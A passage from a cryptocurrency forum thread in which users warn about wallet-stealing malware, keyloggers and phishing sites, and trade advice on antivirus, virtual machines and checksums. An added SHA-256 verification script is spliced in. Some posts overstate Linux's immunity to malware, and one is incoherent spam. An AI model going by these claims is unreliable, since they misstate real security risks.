Yes, it helps sometimes. Linux is open source software, and as they are saying, it is hard for a virus to enter that software because of its highly recommended security, although for me it is hard to use Linux because I think it is not user friendly, but I believe it will save us from different virus attacks. Be wise in all our clicking on websites on the net now.


JosephTam
Newbie
*
Activity: 23
June 16, 2017, 05:52:45 PM
 #129

Thanks for the heads up. I'm new to buying altcoins and this has to be one of my biggest concerns. Are there any programs or software that you recommend I download to protect from viruses or malware?

Thanks
MWesterweele
Hero Member
*****
Activity: 672
June 17, 2017, 11:03:10 AM
 #130

Thanks for the heads up. I'm new to buying altcoins and this has to be one of my biggest concerns. Are there any programs or software that you recommend I download to protect from viruses or malware?

Thanks
For your PC? If your software is Windows, Windows Defender for me is enough. Just be wise, don't click any suspicious links, to avoid getting a virus. Always update your software and antivirus. But if you are using Linux, then I think you are safe because it is not easy for a virus to go inside the software.


silverkamote
Newbie
*
Activity: 28
June 19, 2017, 08:32:35 AM
 #131

Thanks OP for the info. I'll just add this: do you know that there are three traditional ways for malware and viruses to generate bitcoins for their creators? Direct theft of private keys from bitcoin wallets, parasitic bots that mine bitcoin with stolen processing power, and ransomware that encrypts files and demands a bitcoin payment to restore access.
c6m0h3
Jr. Member
*
Activity: 39
June 20, 2017, 03:51:22 PM
 #132

And PLEASE do not rely on Virustotal for verifying that a file is safe. If VT says it's bad then it's highly likely bad. If VT detects nothing it does not mean the file is clean. It means that none of the antivirus engines on VT detected anything bad. It is not that difficult to fool antivirus software.

I would also upload the file to someplace like https://malwr.com/submission/ or http://www.threatexpert.com/submit.aspx to see if anything malicious is detected.
BtcBotting
Newbie
*
Activity: 3
June 23, 2017, 09:24:47 AM
 #133

The thing to really worry about right now is all the NSA exploits/malware floating about..
rkyass
Member
**
Activity: 72
June 29, 2017, 12:13:31 PM
 #134

Thanks, this was very informative. I knew that this forum was a potential target for scammers; that's why I never clicked on any suspicious link. Better be safe than sorry! There are also some ICOs where you will find a lot of scammers, and one should be careful especially on Ethereum crowdsales, as some people will just send you their own ETH address saying that it is the ICO's smart contract address. A lot of people have been scammed this way!
romecheo
Full Member
***
Activity: 182
July 04, 2017, 01:49:07 AM
 #135

I am so grateful for all the information shared on this forum, very informative and detailed. Thank you very much for helping us.

 

kaleparas
Newbie
*
Activity: 3
July 05, 2017, 02:36:51 PM
 #136

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

This is very helpful information. Thank you !!

Josef27
Hero Member
*****
Activity: 784
July 11, 2017, 07:02:21 PM
 #137

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

This is very helpful information. Thank you !!

Thanks! ... You have to stop being cheap! I'm talking to myself here. I'm going to force myself to buy a 100-200.00 used older HP Elite book off Ebay just to deal with my non hardware wallet coins. It's just not worth the risk of cross contamination. No surfing or emails or apps on it. Just the business side of coins and then off the net.
MWesterweele
Hero Member
*****
Activity: 672
July 12, 2017, 12:19:20 PM
 #138

So using Linux or Ubuntu Helps?
Maybe yes, it is not prone to any attacks due to its high security. Recently I received an email; I thought that it was legit and I felt so happy that day, but then I realized that the site extension was not the right one, and then I asked my friend about it and proved that it is fake, so be careful guys.


qiwoman2
Legendary
*
Activity: 1302
July 13, 2017, 05:53:36 AM
 #139

Unfortunately, although this forum is the go-to place for all things Bitcoin and Altcoin, it's also a hotbed for thieves and really nasty elements. I have had a small fortune stolen over the years and the latest was over 1 btc from the myetherwallet phishing hack. Now these etherwallet hackers are all over the slack rooms sending pms in every single altcoin eth token room. It's getting to the point where I don't even like to use ETH anymore but I have no choice as most of these new tokens are being issued on the ETH protocol. Many times I wanted to leave Crypto because of these thieves and hackers but it's all I got. I don't have any other job or source of income.

flag39
Full Member
***
Activity: 168
July 13, 2017, 02:28:33 PM
 #140

Is there any way to know if I have a keylogger in the BIOS or somewhere else? Thanks

Bellator
Sr. Member
****
Activity: 476
July 13, 2017, 04:26:35 PM
 #141

Is there any way to know if I have a keylogger in the BIOS or somewhere else? Thanks
Hmmm, try to do a full scan of your PC I think, and if you are too suspicious, try to reformat your PC for assurance that nothing is left that may steal your info. But think of a reformat as the very last thing you may do.

keeee
Full Member
***
Activity: 210
July 13, 2017, 05:08:09 PM
 #142

*bitcoinwisdomapp.com
Let it be on the list sir, it will victimize us, it's a keylogger.

To avoid the negative effects that we can get from such malware, it is suggested to run each wallet or miner in a different virtual machine with VirtualBox. It's one best solution.

Btw, thank you sir for informing us. It was a big help and a warning as well.

fuer44
Full Member
***
Activity: 224
July 18, 2017, 11:25:46 AM
 #143

In addition to WannaCry there is another dangerous and sophisticated virus. One of them is Kelihos.
Kelihos is a botnet and sometimes known as Hlux. The target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.

MWesterweele
Hero Member
*****
Activity: 672
July 18, 2017, 02:18:00 PM
 #144

In addition to WannaCry there is another dangerous and sophisticated virus. One of them is Kelihos.
Kelihos is a botnet and sometimes known as Hlux. The target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.
Oh no, I have known it only now. So guys, please be aware of everything and let us be wise in all our doings to avoid any malware that we may encounter.


Bellator
Sr. Member
****
Activity: 476
July 20, 2017, 05:24:54 PM
 #145

In addition to WannaCry there is another dangerous and sophisticated virus. One of them is Kelihos.
Kelihos is a botnet and sometimes known as Hlux. The target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.
Oh no, I have known it only now. So guys, please be aware of everything and let us be wise in all our doings to avoid any malware that we may encounter.
Yeah, bitcoin is huge right now, so people will be greedy and they will do anything for money; they will send scam links to many people with the most pleasing content that users may believe, but it contains viruses.

Gens09
Sr. Member
****
Activity: 252
July 21, 2017, 01:18:10 PM
 #146

Thanks for being on top of this and keeping us informed, we do appreciate it!

I think having a desktop wallet is very prone to this.
Vulnerability is high in this case. I guess better to always back up your wallet or choose a safer one.

deddod01
Full Member
***
Activity: 168
July 22, 2017, 07:45:38 AM
 #147

Just to add, so that our PC is not directly exposed to malware:
1. Make sure your computer/PC is always renewable
2. Do not be fooled into downloading unknown software

Zrs
Full Member
***
Activity: 210
"Proof-of-Asset Protocol"
July 22, 2017, 08:00:37 AM
 #148

Is there any way to know if I have a keylogger in the BIOS or somewhere else? Thanks
Hmmm, try to do a full scan of your PC I think, and if you are too suspicious, try to reformat your PC for assurance that nothing is left that may steal your info. But think of a reformat as the very last thing you may do.

I also want to ask the same question and I need a reply. Which app, I mean software, should I use to scan my computer? Now I am using Avast, a free antivirus downloaded from the internet. Does it work properly or do I have to buy the premium service? Someone clear it up for me. Thanks in advance.

vapourminer
Legendary
*
Activity: 1423
what is this "brake pedal" you speak of?
July 22, 2017, 11:12:49 AM
 #149

Is there any way to know if I have a keylogger in the BIOS or somewhere else? Thanks
Hmmm, try to do a full scan of your PC I think, and if you are too suspicious, try to reformat your PC for assurance that nothing is left that may steal your info. But think of a reformat as the very last thing you may do.

I also want to ask the same question and I need a reply. Which app, I mean software, should I use to scan my computer? Now I am using Avast, a free antivirus downloaded from the internet. Does it work properly or do I have to buy the premium service? Someone clear it up for me. Thanks in advance.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
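
Added example, not part of the post above: checking a downloaded file against a published checksum list in the `sha256sum` layout, using SHA-256 rather than MD5. The function names and file names are constructed for this example; the checksum list has to come from a source other than the post that supplied the download link, since a post or quote with a swapped link can swap the hash next to it too.

```python
import hashlib
import hmac
import re

# One line of `sha256sum` output: 64 hex digits, a space, then " " (text mode)
# or "*" (binary mode), then the file name.
MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{64}) [ *](.+)$")


def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large downloads do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def parse_manifest(text):
    """Map file name -> lowercase hex digest; lines in other layouts are ignored."""
    entries = {}
    for line in text.splitlines():
        m = MANIFEST_LINE.match(line)
        if m:
            entries[m.group(2)] = m.group(1).lower()
    return entries


def verify_download(path, published_name, manifest_text):
    """Return "ok", "mismatch", or "not-listed" for the file at `path`.

    `published_name` is the name the file has in the checksum list, which can
    differ from the local name after a browser renames a duplicate download.
    """
    expected = parse_manifest(manifest_text).get(published_name)
    if expected is None:
        return "not-listed"   # no published hash: nothing has been verified
    actual = sha256_of(path)
    return "ok" if hmac.compare_digest(actual, expected) else "mismatch"


if __name__ == "__main__":
    import os
    import tempfile

    # Constructed sample: a 3-byte file whose SHA-256 is the standard "abc" vector.
    demo = os.path.join(tempfile.mkdtemp(), "wallet-linux64.tar.gz")
    with open(demo, "wb") as fh:
        fh.write(b"abc")
    listing = (
        "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
        "  wallet-linux64.tar.gz\n"
    )
    print(verify_download(demo, "wallet-linux64.tar.gz", listing))
```

A matching hash only shows the file is the one the list's publisher hashed; it says nothing about whether that publisher is trustworthy.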
Zrs
Full Member
***
Activity: 210
"Proof-of-Asset Protocol"
July 23, 2017, 11:54:26 AM
 #150

Is there any way to know if I have a keylogger in the BIOS or somewhere else? Thanks
Hmmm, try to do a full scan of your PC I think, and if you are too suspicious, try to reformat your PC for assurance that nothing is left that may steal your info. But think of a reformat as the very last thing you may do.

I also want to ask the same question and I need a reply. Which app, I mean software, should I use to scan my computer? Now I am using Avast, a free antivirus downloaded from the internet. Does it work properly or do I have to buy the premium service? Someone clear it up for me. Thanks in advance.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
Virtual PC? What is this? Remote desktop or not? May I use a virtual PC for installing a wallet? I have seen a huge number of people lose their coins by downloading an untrusted wallet, so I am not installing any wallet or software on my computer. But when an airdrop occurs, what will I do? Without downloading their wallet it isn't possible to join the airdrop. Any suggestion, warning?


vapourminer
Legendary
*
Activity: 1423
what is this "brake pedal" you speak of?
July 23, 2017, 02:08:38 PM
 #151

I also want to ask the same question and I need a reply. Which app, I mean software, should I use to scan my computer? Now I am using Avast, a free antivirus downloaded from the internet. Does it work properly or do I have to buy the premium service? Someone clear it up for me. Thanks in advance.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
Virtual pc? what is this? remote desktop or not? may i use virtual pc for installing a wallet ? I have seen huge number of people lost their coin by downloading entrusted wallet.so i am not installing any wallet or software in my computer.But when any Airdrop occurs , what i will do? with out downloading their wallet it cant possible to join the airdrop.any suggestion,warning ?

https://en.wikipedia.org/wiki/Virtual_machine

it allows you run run software so it cannot interact with the real pc its running on, or other vms on the same machine. theory is any malware is contained in just that the virtual machine.

you can run many vms on one real pc. so you run one wallet per vm and if one is malware it cannot affect the other stuff on the other vms. so basically is a jail malware cannot escape from.

you dedicate a vm to one altcoin wallet and run nothing else in that vm (except antivirus and a browser to get the wallet). so malware has nothing to steal/compromise. of course that wallet may be able to steal your coins from itself, but it cant steal coins from wallets running on other vms. ie it does not prevent trojans from running but it contains the damage. and you never enter sensitive info or enter sensitive sites on that vm (like no visiting exchange sites/email accounts) so it cannot collect passwords or anything. you use a regular machine for exchanges/email/whatever, or even a vm set up for just email/exchanges.

however.. its still not 100% perfect depending on how you set up it there can still be risks. but in general its quit safe.

there are many vms that are free. you can run windows and *nix on vms.
negancoin
Full Member
***
Online Online

Activity: 168


Privacy Focused Blockchain Timestamping Office


View Profile
July 25, 2017, 02:16:57 AM
 #152

Very informative for newbies. I always scan files with Malwarebytes; I trust this program.

Zrs
Full Member
***
Offline Offline

Activity: 210


"Proof-of-Asset Protocol"


View Profile
July 26, 2017, 06:13:33 AM
 #153

I also want to ask the same question and I need a reply. Which app, I mean software, should I use to scan my computer? Right now I am using Avast, a free antivirus downloaded from the internet. Does it work properly or do I have to buy the premium service? Someone please clear it up for me. Thanks in advance.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the author's site when you can. learn how md5/sha hashes work and verify your downloads with them, especially wallets.

don't download wallets for crapcoins willy nilly, many have trojans. if you must, use a virtual pc and even then be careful.
Virtual PC? What is this? Remote desktop or not? May I use a virtual PC for installing a wallet? I have seen a huge number of people lose their coins by downloading an untrusted wallet, so I am not installing any wallet or software on my computer. But when an airdrop occurs, what will I do? Without downloading their wallet it is not possible to join the airdrop. Any suggestions or warnings?

https://en.wikipedia.org/wiki/Virtual_machine

it allows you to run software so it cannot interact with the real pc it's running on, or other vms on the same machine. theory is any malware is contained in just that virtual machine.

you can run many vms on one real pc. so you run one wallet per vm and if one is malware it cannot affect the other stuff on the other vms. so basically it's a jail malware cannot escape from.

you dedicate a vm to one altcoin wallet and run nothing else in that vm (except antivirus and a browser to get the wallet). so malware has nothing to steal/compromise. of course that wallet may be able to steal your coins from itself, but it can't steal coins from wallets running on other vms. i.e. it does not prevent trojans from running but it contains the damage. and you never enter sensitive info or enter sensitive sites on that vm (like no visiting exchange sites/email accounts) so it cannot collect passwords or anything. you use a regular machine for exchanges/email/whatever, or even a vm set up for just email/exchanges.

however.. it's still not 100% perfect. depending on how you set it up there can still be risks. but in general it's quite safe.

there are many vms that are free. you can run windows and *nix on vms.

Thank you boss for your kind information. Just bookmarked the site: https://en.wikipedia.org/wiki/Virtual_machine and will try to read it carefully. Also, you described it nicely. Will try to use it and review it here. Best regards
Zrs

Kaller
Hero Member
*****
Offline Offline

Activity: 525


★Jetwin.com★


View Profile
August 04, 2017, 10:05:39 PM
 #154

Some guy lost $150,000 of Bitcoins (50 BTC) a couple days ago trying to get access to his Bitcoin Cash.
He downloaded a malware "wallet" from an unknown site, but after opening the .exe file found his Bitcoin had all been stolen.
Let this be a reminder to all that you should be very careful about clicking links, downloading/installing programs, etc. related to cryptocurrencies!


Muhammad Muneeb
Full Member
***
Offline Offline

Activity: 140


Best IoT Platform Based on Blockchain


View Profile
August 06, 2017, 09:12:41 PM
 #155

What do we really need to do to remain uninfected by malware... since with the growth of bitcoin, bad people are trying to steal bitcoin in different ways.

DAVETUN
Full Member
***
Offline Offline

Activity: 168



View Profile
August 07, 2017, 07:36:50 PM
 #156

My system was infected with malware. I use the AVG antivirus version and it helped to discover and delete it. I recommend this, and also ensure you don't visit sites that entice with earning free BTC or altcoins; there are lots of scammers and thieves out there.

chichigirl
Full Member
***
Offline Offline

Activity: 238


Next.Exchange - Decentralized Stock Market Exchang


View Profile
August 10, 2017, 10:21:53 AM
 #157

Hi guys, I have a problem: I have just logged my MyEtherWallet wallet private key into a fake MyEtherWallet site. I just don't know what to do. Is there any way to change the private key? The ETH wallet has no coins anyway, but soon it will have (from bounties). Please advise me what to do.

Jake Roberson
Member
**
Offline Offline

Activity: 112


View Profile
August 11, 2017, 03:59:11 PM
 #158

Thanks for the significant attention, based on BTC protection which could be absorbed for some technical reasons, if not you, appreciate that!
casey.anthony195
Full Member
***
Offline Offline

Activity: 140



View Profile
August 11, 2017, 04:01:58 PM
 #159

Thank you for listing all of this here. This post actually saved my money twice(!) today, as some guys tried to replace download links in the discussion on the other forums.
oreits11
Full Member
***
Offline Offline

Activity: 168



View Profile
August 11, 2017, 06:58:32 PM
 #160


different basics on customs with personal profiles as users of altcoins to decide with strategics as occupying use of tools and utility as helps with the running of manage to gains with the better returns on complements.
as measuring counts with the focus on view with the appreciation on distinct on parts with the commons on variables to turns with the following on priors as closing with the decision as gains of returns of exchange.

the specifics of details on casuals to bring to mechanical practice of functional system as expert from the different background of ideal works with the offers on jobs market as accepting request from the buyer of the wider networks as clusters of profile with membership.



Black_bl
Full Member
***
Offline Offline

Activity: 154


View Profile
August 12, 2017, 01:13:30 PM
 #161

Hi guys, I have a problem: I have just logged my MyEtherWallet wallet private key into a fake MyEtherWallet site. I just don't know what to do. Is there any way to change the private key? The ETH wallet has no coins anyway, but soon it will have (from bounties). Please advise me what to do.

Create a new wallet and try to redirect the payment to your new wallet (contact the dev team that will send the payment for bounties). I guess this is the only possible way.

dpevoav
Newbie
*
Offline Offline

Activity: 3


View Profile
August 16, 2017, 03:53:21 PM
 #162

Some guy lost $150,000 of Bitcoins (50 BTC) a couple days ago trying to get access to his Bitcoin Cash.
He downloaded a malware "wallet" from an unknown site, but after opening the .exe file found his Bitcoin had all been stolen.
Let this be a reminder to all that you should be very careful about clicking links, downloading/installing programs, etc. related to cryptocurrencies!

So true. What wallet was the BTC stored in?

Black_bl
Full Member
***
Offline Offline

Activity: 154


View Profile
August 17, 2017, 06:02:30 PM
 #163

I guess he used Electrum and wanted to download the Electrum cash wallet, but he went to a fake site, electrum.com, instead of electrum.org.